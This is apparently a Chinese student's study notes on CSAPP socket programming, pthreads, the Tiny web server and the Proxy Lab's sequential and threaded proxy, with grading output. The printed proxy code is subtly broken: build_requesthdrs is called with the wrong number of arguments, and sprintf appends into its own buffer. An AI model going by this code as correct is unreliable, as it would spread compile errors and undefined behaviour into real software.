}

在和服务器建立连接之后，客户端进入一个循环，反复从标准输入读取文本行，发送文本行给服务器，从服务器读取回送的行，并输出结果到标准输出

当 fgets 在标准输入上遇到 EOF 时，或者因为用户在键盘上键入 Ctrl+D，或者因为在一个重定向的输入文件中用尽了所有的文本行时，循环就终止

echo 服务器案例：

#include "csapp.h"

void echo(int connfd);

int main(int argc, char **argv)
{
    int listenfd, connfd;
    socklen_t clientlen;
    struct sockaddr_storage clientaddr; /* Enough space for any address */
    char client_hostname[MAXLINE], client_port[MAXLINE];

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(0);
    }
    
    listenfd = Open_listenfd(argv[1]);
    /* 打开和返回一个监听描述符，这个描述符准备好在端口argv[1]接收连接请求 */
    while (1) {
        clientlen = sizeof(struct sockaddr_storage);
        connfd = Accept(listenfd, (SA *)&clientaddr, &clientlen);
        /* 等待来自客户端的连接请求到达侦听描述符listenfd，然后在clientaddr中填写客户端的套接字地址，并返回一个已连接描述符(connfd) */
        Getnameinfo((SA *) &clientaddr, clientlen, client_hostname, MAXLINE,
                    client_port, MAXLINE, 0);
        /* 将一个套接字地址结构转换成相应的主机和服务名字符串 */
        printf("Connected to (%s, %s)\n", client_hostname, client_port);
        /* 打印客户端信息 */ 
        echo(connfd);
        /* 调用echo 函数为这些客户端服务 */
        Close(connfd);
    }
    exit(0);
}

void echo(int connfd)
{
    size_t n;
    char buf[MAXLINE];
    rio_t rio;

    Rio_readinitb(&rio, connfd);
    /* 将"描述符clientfd"和"地址在rio处的一个的读缓冲区"联系起来 */
    while ((n = Rio_readlineb(&rio, buf, MAXLINE)) != 0) {
        /* 从&rio读出下一个文本行（包括结尾的换行符，数最多maxlen-1个字节），将它复制到内存位置buf，并且用NULL字符来结束这个文本行 */
        printf("server received %d bytes\n", (int)n);
        Rio_writen(connfd, buf, n);
        /* 打印buf */ 
    }
}

在打开监听描述符后，它进入一个无限循环，每次循环都等待一个来自客户端的连接请求，输出已连接客户端的域名和 IP 地址，并调用 echo 函数为这些客户端服务，在 echo 程序返回后，主程序关闭已连接描述符，一旦客户端和服务器关闭了它们各自的描述符，连接也就终止了

echo函数将反复读写文本行，直到rio_readlineb函数遇到EOF

参考：Socket原理讲解

多线程编程

多线程是多任务处理的一种特殊形式，多任务处理允许让电脑同时运行两个或两个以上的程序，一般情况下，两种类型的多任务处理：基于进程和基于线程

基于进程的多任务处理是程序的并发执行
基于线程的多任务处理是同一程序的片段的并发执行

多线程程序包含可以同时运行的两个或多个部分，这样的程序中的每个部分称为一个线程，每个线程定义了一个单独的执行路径

C语言中有专门控制线程的函数：

创建新线程

1	pthread_create (thread, attr, start_routine, arg);

thread：指向线程标识符的指针
attr：一个不透明的属性对象，可以被用来设置线程属性，您可以指定线程属性对象，也可以使用默认值 NULL
start_routine：线程运行函数起始地址，一旦线程被创建就会执行（通常设置为某个函数）
arg：运行函数的参数，它必须通过把引用作为指针强制转换为 void 类型进行传递，如果没有传递参数，则使用 NULL

pthread_create 创建一个新的线程，并让它可执行目标函数

终止线程

1	pthread_exit (status);

显式地退出一个线程，通常情况下，pthread_exit() 函数是在线程完成工作后无需继续存在时被调用，如果 main() 是在它所创建的线程之前结束，并通过 pthread_exit() 退出，那么其他线程将继续执行，否则，它们将在 main() 结束时自动被终止

连接和分离线程

1 2	pthread_join (threadid, status) pthread_detach (threadid)

pthread_join() 阻塞等待线程退出（直到指定的 threadid 线程终止为止），获取线程退出状态
pthread_detach() 表示主线程与子线程（threadid）分离，两者相互不干涉，子线程结束同时子线程的资源自动回收

当创建一个线程时，它的某个属性会定义它是否是可连接的（joinable）或可分离的（detached），只有创建时定义为可连接的线程才可以被连接，如果线程创建时被定义为可分离的，则它永远也不能被连，pthread_join() 函数来等待线程的完成

// pthread库不是Linux系统默认的库，连接时需要使用库libpthread.a, 在使用pthread_create创建线程时，在编译中要加-lpthread参数:

1	gcc test.c -lpthread -o test

案例：pthread_join

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <pthread.h>

typedef struct {
    char ch;
    int var;
    char str[64];
}th_t;

void* thrd_func(void* arg) {
    th_t* retvar = (th_t*)arg;

    retvar->ch = 'm';
    retvar->var = 200;
    strcpy(retvar->str, "my thread");
    puts("success!!!");

    // 线程的退出可以将return换成pthread_exit
    pthread_exit((void*)retvar);
}

int main(void) {

    pthread_t tid;
    int ret;
    th_t* retval = NULL;
    retval = malloc(sizeof(th_t));

    ret = pthread_create(&tid, NULL, thrd_func, (void*)retval);
    if (ret != 0) {
        fprintf(stderr, "pthread_create error:%s\n", strerror(ret));
        exit(1); // 整个进程退出
    }

    /* 阻塞并获取返回值(状态值) */
    pthread_join(tid, (void**)&retval);
    /* 接下来就会演示把pthread_join注释后的结果 */
    printf("ch = %c, var = %d, str = %s\n", retval->ch, retval->var, retval->str);
    if (retval != NULL) {
        free(retval);
        retval = NULL;
    }
    /* 注意：这里只是将主线程退出，若还有其它子线程在运行则仍会运行
    而return将会使整个进程结束 */

    pthread_exit((void*)1);
}

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
success!!!
ch = m, var = 200, str = my thread

把“pthread_join(tid, (void **)&retval)”注释掉以后：

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
ch = , var = 0, str = 
success!!!

发现主线程和副线程的执行次序改变了（主副线程同时执行，但是主线程先操作“retval”变量）

添加了“pthread_join”后，主线程就会被阻塞，直到标识符“tid”代表的副线程终止后，主线程才开始执行（需要副线程先给“retval”变量赋值后，主线程才可以打印出来）

案例：pthread_detach

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <pthread.h>


void* thrd_func(void* arg)
{
    printf("i am detach.\n");
    pthread_exit((void*)77);
}

int main(void)
{
    pthread_t tid;
    int ret;

    ret = pthread_create(&tid, NULL, thrd_func, NULL);
    if (ret != 0) {
        fprintf(stderr, "pthread_create error:%s\n", strerror(ret));
        exit(1);
    }

    /* 实现线程分离，不再受主线程管理，由系统接任，线程结束后，其退出状态不由其他线程获取，而直接自己自动释放 */
    ret = pthread_detach(tid);

    if (ret != 0) {
        fprintf(stderr, "pthread_detach error:%s\n", strerror(ret));
        exit(1);
    }

    sleep(1);
    printf("main pid=%d, tid=%lu\n", getpid(), pthread_self());
    pthread_exit((void*)0);
}

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
i am detach.
main pid=3830, tid=140138689746752

线程可以被置为 detach 状态，这样的线程一旦终止就立刻回收它占用的所有资源，而不保留终止状态，不能对一个已经处于detach状态的线程调用pthread_join，这样的调用将返回EINVAL错误

参考：C语言多线程操作

实验一：实现顺序web代理

实现一个顺序执行的代理，它可以处理GET方法并转发，对于其他方法可以不实现

命令行调用 “./proxy < port >” 来启动代理服务器，其中 port 可以通过实验包中的工具 port-for-user 来获取

测试服务器

运行该服务器，指定一个端口，必须是1024–49151之间的端口，其余端口不能使用

1	➜ [/home/ywhkkx/proxylab-handout/tiny] ./tiny 1444

在运行了TINY 服务器的基础上，打开另一个terminal，在linux shell输入：

➜  [/home/ywhkkx/proxylab-handout/tiny] telnet localhost 1444
     telnet localhost 1444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /home.html HTTP/1.0

HTTP/1.0 200 OK /* 200表示成功获取 */
Server: Tiny Web Server
Content-length: 120
Content-type: text/html

<html> // 获取的内容
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html> 
Connection closed by foreign host.

此时服务端的内容：

1
2
3

➜  [/home/ywhkkx/proxylab-handout/tiny] ./tiny 1444
Accepted connection from (ip6-localhost, 47590) // 打印了用户信息
GET /home.html HTTP/1.0

理解服务器代码

#include "csapp.h"

void doit(int fd);
void read_requesthdrs(rio_t* rp);
int parse_uri(char* uri, char* filename, char* cgiargs);
void serve_static(int fd, char* filename, int filesize);
void get_filetype(char* filename, char* filetype);
void serve_dynamic(int fd, char* filename, char* cgiargs);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);

int main(int argc, char** argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    listenfd = Open_listenfd(argv[1]);
    /* 打开和返回一个监听描述符，这个描述符准备好在端口 port_h 接收连接请求 */
    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen); 
        /* 等待来自客户端的连接请求到达侦听描述符listenfd，然后在clientaddr中填写客户端的套接字地址，并返回一个已连接描述符 */
        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        /* 将一个套接字地址结构转换成相应的主机和服务名字符串 */
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        /* 调用打印信息 */ 
        doit(connfd);        
        /* 进行服务 */
        Close(connfd);           
        /* 关闭连接 */
    }
}

void doit(int fd)
{
    int is_static;
    struct stat sbuf; /* 这个结构体用来描述一个linux系统文件系统中的文件属性的结构 */
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    char filename[MAXLINE], cgiargs[MAXLINE];
    rio_t rio;

    Rio_readinitb(&rio, fd);
     /* 将"描述符fd"和"地址在rio处的一个的读缓冲区"联系起来 */
    if (!Rio_readlineb(&rio, buf, MAXLINE)) 
        return;
    /* 从&rio读出下一个文本行（包括结尾的换行符，数最多MAXLINE-1个字节），将它复制到内存位置buf，并且用NULL字符来结束这个文本行 */
    printf("%s", buf);
    /* 打印读取的数据 */
    sscanf(buf, "%s %s %s", method, uri, version);       
    /* 输入'方法','标识','版本' */
    if (strcasecmp(method, "GET")) {                     
        clienterror(fd, method, "501", "Not Implemented",
            "Tiny does not implement this method");
        return;
    }                                                   
    read_requesthdrs(&rio); 
    /* 忽略请求报头中的信息 */

    is_static = parse_uri(uri, filename, cgiargs); 
    /* 解析uri(标识),得文件名存入filename中,参数存入cgiargs中 */
    if (stat(filename, &sbuf) < 0) {  
        /* 将文件filename中的各个元数据填写进sbuf中,如果找不到文件返回0 */
        clienterror(fd, filename, "404", "Not found",
            "Tiny couldn't find this file");
        /* 向客户端返回错误信息 */
        return;
    }                                                   

    if (is_static) { 
        if (!(S_ISREG(sbuf.st_mode)) || !(S_IRUSR & sbuf.st_mode)) { 
            /* 此文件为普通文件? 有读取权限?(-r)(若没有则return) */
            clienterror(fd, filename, "403", "Forbidden",
                "Tiny couldn't read the file");
            return;
        }
        serve_static(fd, filename, sbuf.st_size);  
        /* 提供静态服务(获取文件) */
    }
    else {
        if (!(S_ISREG(sbuf.st_mode)) || !(S_IXUSR & sbuf.st_mode)) { 
            /* 此文件为普通文件? 有执行权限?(-x)(若没有则return) */
            clienterror(fd, filename, "403", "Forbidden",
                "Tiny couldn't run the CGI program");
            return;
        }
        serve_dynamic(fd, filename, cgiargs);       
        /* 提供动态服务(指令控制) */
    }
}

void read_requesthdrs(rio_t* rp)
{
    /* 读这些请求报头，直到空行，然后返回，跳过这些请求报头的 */
    char buf[MAXLINE];

    Rio_readlineb(rp, buf, MAXLINE);
    printf("%s", buf);
    while (strcmp(buf, "\r\n")) {          
        Rio_readlineb(rp, buf, MAXLINE);
        printf("%s", buf);
    }
    return;
}

int parse_uri(char* uri, char* filename, char* cgiargs)
{
    /* 解析uri，得文件名存入filename中，参数存入cgiargs中 */
    char* ptr;

    /* 据uri中是否含有cgi-bin来判断请求的是静态内容还是动态内容 */
    if (!strstr(uri, "cgi-bin")) {
        /* 静态内容 */
        strcpy(cgiargs, "");                             
        strcpy(filename, ".");                           
        strcat(filename, uri);                           
        if (uri[strlen(uri) - 1] == '/')                   
            strcat(filename, "home.html");               
        return 1;
    }
    else {  
        /* 动态内容 */
        ptr = index(uri, '?');                           
        if (ptr) {
            strcpy(cgiargs, ptr + 1);
            *ptr = '\0';
        }
        else
            strcpy(cgiargs, "");                         
        strcpy(filename, ".");                           
        strcat(filename, uri);                           
        return 0;
    }
}

void serve_static(int fd, char* filename, int filesize)
{
    /* 打开文件名为filename的文件，把它映射到一个虚拟存储器空间，将文件的前filesize字节映射到从地址srcp开始的虚拟存储区域 */
    int srcfd;
    char* srcp, filetype[MAXLINE], buf[MAXBUF];
    
    get_filetype(filename, filetype);   
    /* 从*filename中获取filetype */
    sprintf(buf, "HTTP/1.0 200 OK\r\n"); 
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Server: Tiny Web Server\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-length: %d\r\n", filesize);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: %s\r\n\r\n", filetype);
    Rio_writen(fd, buf, strlen(buf));   

    srcfd = Open(filename, O_RDONLY, 0); 
    /* 打开目标文件(只读方式) */
    srcp = Mmap(0, filesize, PROT_READ, MAP_PRIVATE, srcfd, 0); 
    /* 让系统自动选定地址，把filesize字节的数据映射到内存，映射区域可被读取，对映射区域的写入操作会产生一个映射文件的复制(私人的“写入时复制”)，将要映射到内存中的文件描述符为‘srcfd’ */
    Close(srcfd);                       
    Rio_writen(fd, srcp, filesize);    
    /* 把内存中的‘srcp’读到fd */
    Munmap(srcp, filesize);   
    /* 解除内存映射 */
}

void get_filetype(char* filename, char* filetype)
{
   /* 根据filename获取文件格式 */
    if (strstr(filename, ".html"))
        strcpy(filetype, "text/html");
    else if (strstr(filename, ".gif"))
        strcpy(filetype, "image/gif");
    else if (strstr(filename, ".png"))
        strcpy(filetype, "image/png");
    else if (strstr(filename, ".jpg"))
        strcpy(filetype, "image/jpeg");
    else
        strcpy(filetype, "text/plain");
}

void serve_dynamic(int fd, char* filename, char* cgiargs)
{
    /* Tiny在发送了响应的第一部分后，通过派生一个子进程并在子进程的上下文中运行一个cgi程序（可执行文件），来提供各种类型的动态内容 */
    char buf[MAXLINE], * emptylist[] = { NULL };

    sprintf(buf, "HTTP/1.0 200 OK\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Server: Tiny Web Server\r\n");
    Rio_writen(fd, buf, strlen(buf));

    if (Fork() == 0) { 
        /* 在父进程中，fork返回子进程的进程ID，在子进程中，fork返回0 */
        setenv("QUERY_STRING", cgiargs, 1); /* 设置QUERY_STRING环境变量 */
        Dup2(fd, STDOUT_FILENO); /* 重定向它的标准输出到已连接描述符 */         
        Execve(filename, emptylist, environ); /* 加载运行cgi程序 */
    }
    Wait(NULL); /* 允许线程阻止其自身执行(父进程等待) */
}

void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    /* 向客户端返回错误信息 */
    char buf[MAXLINE];

    /* 打印HTTP响应头 */
    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n\r\n");
    Rio_writen(fd, buf, strlen(buf));

    /* 打印HTTP响应正文 */
    sprintf(buf, "<html><title>Tiny Error</title>");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<body bgcolor=""ffffff"">\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<hr><em>The Tiny Web server</em>\r\n");
    Rio_writen(fd, buf, strlen(buf));
}

Tiny是一个迭代服务器，监听在命令行中确定的端口上的连接请求，在通过 open_listenedfd 函数打开一个监听套接字以后，Tiny执行典型的无限服务循环，反复地接受一个连接(accept)请求，执行事务(doit)，最后关闭连接描述符(close)

编写代理

用户在代理中输入指令，代理会解析指令并发送到服务器，同时它也会接收服务器上的反馈，并返回给用户

先抄 TINY 的框架：

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";

void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);

int main(int argc, char** argv)
{
    int listenfd, connfd; 
    pthread_t tid;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    signal(SIGPIPE, SIG_IGN); /* 新添:给SIGPIPE设置SIG_IGN信号处理函数，忽略该信号 */

    listenfd = Open_listenfd(argv[1]);
    /* 打开和返回一个监听描述符，这个描述符准备好在端口port_h接收连接请求 */
    while (1) {
        printf("listening..\n");
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);
        /* 等待来自客户端的连接请求到达侦听描述符listenfd，然后在clientaddr中填写客户端的套接字地址，并返回一个已连接描述符 */

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        /* 获取用户信息 */
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        /* 打印用户信息 */
        doit(connfd);
        /* 执行服务程序 */
        Close(connfd);
    }
}

void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    Rio_readinitb(&from_client, client_fd);
    /* 将"描述符client_fd"和"地址在from_client处的一个的读缓冲区"联系起来 */
    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    /* 从&from_client读出下一个文本行（包括结尾的换行符，数最多MAXLINE-1个字节），将它复制到内存位置buf，并且用NULL字符来结束这个文本行 */
    sscanf(buf, "%s %s %s", method, uri, version);
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }
    parse_uri(uri, hostname, path, &port); /* 改写:这个函数代码不同了 */
	/* 解析uri，得文件名存入filename中，参数存入cgiargs中 */
    
    /*------------------------------------------------------------*/
    /* 后面的内容TINY完全不同了(clienterror函数除外) */
    /*------------------------------------------------------------*/
    
    char port_str[10];
    sprintf(port_str, "%d", port);
    endserver_fd = Open_clientfd(hostname, port_str);
    /* 将socket和connect封装成Open_clientfd，客户端可以用它来和服务器建立连接 */
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }
    
    Rio_readinitb(&to_endserver, endserver_fd);
    /* 将"描述符endserver_fd"和"地址在to_endserver处的一个的读缓冲区"联系起来 */
    char newreq[MAXLINE]; 
    sprintf(newreq, "GET %s HTTP/1.0\r\n", path);
    build_requesthdrs(&from_client, newreq, hostname); /* 新添:这是一个全新的函数 */
    Rio_writen(endserver_fd, newreq, strlen(newreq)); 
    
    int n;
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE))) {
        printf("proxy received %d bytes,then send\n",n); /* 新添:提示语句 */
        Rio_writen(client_fd, buf, n); /* 新增:向客户端发送请求的数据 */
    }
    /* 打印获取的数据 */
}

void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    sprintf(body, "<html><title>Proxy Error</title>");
    sprintf(body, "%s<body bgcolor=""ffffff"">\r\n", body);
    sprintf(body, "%s%s: %s\r\n", body, errnum, shortmsg);
    sprintf(body, "%s<p>%s: %s\r\n", body, longmsg, cause);
    sprintf(body, "%s<hr><em>The Proxy Web server</em>\r\n", body);

    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

下面编写两个改动&新增的函数：（这两个函数需要按照 “实验要求” 进行编写）

实验要求消息请求行&消息请求头为：

GET /hub/index.html HTTP/1.0
Host: www.cmu.edu
Connection: close
Proxy-Connection: close

而我们在 Proxy 写入的指令为：（其中“GET”和“HTTP/1.0”已经被处理）

1	GET http://www.cmu.edu/hub/index.html HTTP/1.0

所以这两个函数的作用，就是把 uri（统一资源标识符）转化为请求：

void parse_uri(char *uri,char *hostname,char *path,int *port) {
    /* hostname: www.cmu.edu */
    /* path: /hub/index.html */
    *port = 80;
    char* pos1 = strstr(uri,"//");
    if (pos1 == NULL) {
        pos1 = uri;
    } else pos1 += 2;

    char* pos2 = strstr(pos1,":");
    if (pos2 != NULL) {
        *pos2 = '\0'; 
        strncpy(hostname,pos1,MAXLINE);
        sscanf(pos2+1,"%d%s",port,path); 
        *pos2 = ':';
    } else {
        pos2 = strstr(pos1,"/");
        if (pos2 == NULL) {
            strncpy(hostname,pos1,MAXLINE);
            strcpy(path,"");
            return;
        }
        *pos2 = '\0';
        strncpy(hostname,pos1,MAXLINE);
        *pos2 = '/';
        strncpy(path,pos2,MAXLINE);
    }
}

void build_requesthdrs(rio_t *rp, char *newreq, char *hostname, char* port) {
    /* 用于构建请求，把写入代理的指令进行包装，传输进服务器 */
    char buf[MAXLINE];

    while(Rio_readlineb(rp, buf, MAXLINE) > 0) {          
    if (!strcmp(buf, "\r\n")) break;
        if (strstr(buf,"Host:") != NULL) continue;
        if (strstr(buf,"User-Agent:") != NULL) continue;
        if (strstr(buf,"Connection:") != NULL) continue;
        if (strstr(buf,"Proxy-Connection:") != NULL) continue;

    sprintf(newreq,"%s%s", newreq,buf);
    }
    sprintf(newreq, "%sHost: %s:%s\r\n",newreq, hostname,port);
    sprintf(newreq, "%s%s%s%s", newreq, user_agent_hdr,conn_hdr,prox_hdr);
    sprintf(newreq,"%s\r\n",newreq);
}

整体逻辑：

代理的前半部分和服务器如出一辙，先作为服务器链接用户端，然后调用 doit 启动自身服务，在 doit 中为“用户端的描述符”绑定内存空间，并把用户端信息复制到该空间，接着输入指令装入其中，并调用 parse_uri 进行解析
代理的后半部分又将作为客户端与目标服务器进行通信，先连接服务器并生成描述符，接着用类似的操作为“服务端的描述符”绑定内存空间，然后调用 build_requesthdrs 生成对应的服务请求，最后发送服务请求并打印数据

打分：

➜  [/home/ywhkkx/proxylab-handout] ./driver.sh 
*** Basic ***
Starting tiny on 4113
Starting proxy on 21528
1: home.html
   Fetching ./tiny/home.html into ./.proxy using the proxy
   Fetching ./tiny/home.html into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
2: csapp.c
   Fetching ./tiny/csapp.c into ./.proxy using the proxy
   Fetching ./tiny/csapp.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
3: tiny.c
   Fetching ./tiny/tiny.c into ./.proxy using the proxy
   Fetching ./tiny/tiny.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
4: godzilla.jpg
   Fetching ./tiny/godzilla.jpg into ./.proxy using the proxy
   Fetching ./tiny/godzilla.jpg into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
5: tiny
   Fetching ./tiny/tiny into ./.proxy using the proxy
   Fetching ./tiny/tiny into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
Killing tiny and proxy
basicScore: 40/40

实验二：实现多线程web代理

整体变化不大，直接挂代码了：（我会标记改动的地方）

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";


void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);


int main(int argc, char** argv)
{
    int listenfd, * connfd; /* 不同:这里变指针了 */
    pthread_t tid;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    signal(SIGPIPE, SIG_IGN);

    listenfd = Open_listenfd(argv[1]);
    while (1) {
        printf("listening..\n");
        clientlen = sizeof(clientaddr);
        connfd = Malloc(sizeof(int));
        /* 不同:这里改为在堆中分配内存空间(原来是栈,栈不稳定) */
        *connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        Pthread_create(&tid, NULL, thread, connfd);
        /* 新添:Pthread_create用于创建子线程(从thread开始执行,参数为connfd) */
    }
}

void* thread(void* vargp)
{
    int connfd = *((int*)vargp);
    Pthread_detach(pthread_self());
    /* 设定线程分离,使其永远不会影响主线程 */
    Free(vargp);
    /* 因为执行了Pthread_detach,所以free的操作不会影响到主线程 */
    doit(connfd);
    /* 执行服务程序 */
    Close(connfd);
    return NULL;
}

void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    Rio_readinitb(&from_client, client_fd);

    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    sscanf(buf, "%s %s %s", method, uri, version);
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }

    parse_uri(uri, hostname, path, &port);
    char port_str[10];
    sprintf(port_str, "%d", port);
    endserver_fd = Open_clientfd(hostname, port_str);
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }
    Rio_readinitb(&to_endserver, endserver_fd);

    char newreq[MAXLINE]; 
    sprintf(newreq, "GET %s HTTP/1.0\r\n", path);
    build_requesthdrs(&from_client, newreq, hostname);

    Rio_writen(endserver_fd, newreq, strlen(newreq)); 
    int n;
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE))) {
        printf("proxy received %d bytes,then send\n",n);
        Rio_writen(client_fd, buf, n);  
    }
}

void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    sprintf(body, "<html><title>Proxy Error</title>");
    sprintf(body, "%s<body bgcolor=""ffffff"">\r\n", body);
    sprintf(body, "%s%s: %s\r\n", body, errnum, shortmsg);
    sprintf(body, "%s<p>%s: %s\r\n", body, longmsg, cause);
    sprintf(body, "%s<hr><em>The Proxy Web server</em>\r\n", body);

    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

void parse_uri(char* uri, char* hostname, char* path, int* port) {
    *port = 80;
    char* pos1 = strstr(uri, "//");
    if (pos1 == NULL) {
        pos1 = uri;
    }
    else pos1 += 2;

    char* pos2 = strstr(pos1, ":");
    if (pos2 != NULL) {
        *pos2 = '\0'; 
        strncpy(hostname, pos1, MAXLINE);
        sscanf(pos2 + 1, "%d%s", port, path); 
        *pos2 = ':';
    }
    else {
        pos2 = strstr(pos1, "/");
        if (pos2 == NULL) {
            strncpy(hostname, pos1, MAXLINE);
            strcpy(path, "");
            return;
        }
        *pos2 = '\0';
        strncpy(hostname, pos1, MAXLINE);
        *pos2 = '/';
        strncpy(path, pos2, MAXLINE);
    }
}

void build_requesthdrs(rio_t* rp, char* newreq, char* hostname, char* port) {
    char buf[MAXLINE];

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        if (!strcmp(buf, "\r\n")) break;
        if (strstr(buf, "Host:") != NULL) continue;
        if (strstr(buf, "User-Agent:") != NULL) continue;
        if (strstr(buf, "Connection:") != NULL) continue;
        if (strstr(buf, "Proxy-Connection:") != NULL) continue;

        sprintf(newreq, "%s%s", newreq, buf);
    }
    sprintf(newreq, "%sHost: %s:%s\r\n", newreq, hostname, port);
    sprintf(newreq, "%s%s%s%s", newreq, user_agent_hdr, conn_hdr, prox_hdr);
    sprintf(newreq, "%s\r\n", newreq);
}

打分：

*** Concurrency ***
Starting tiny on port 11348
Starting proxy on port 8656
Starting the blocking NOP server on port 8806
Trying to fetch a file from the blocking nop-server
Fetching ./tiny/home.html into ./.noproxy directly from Tiny
Fetching ./tiny/home.html into ./.proxy using the proxy
Checking whether the proxy fetch succeeded
Success: Was able to fetch tiny/home.html from the proxy.
Killing tiny, proxy, and nop-server
concurrencyScore: 15/15

实验三：缓存web对象

要求实现缓存客户端的请求

其中最大的缓存块大小要小于 MAX_OBJECT_SIZE（102400）
总的缓存大小 MAX_CACHE_SIZE（1049000）
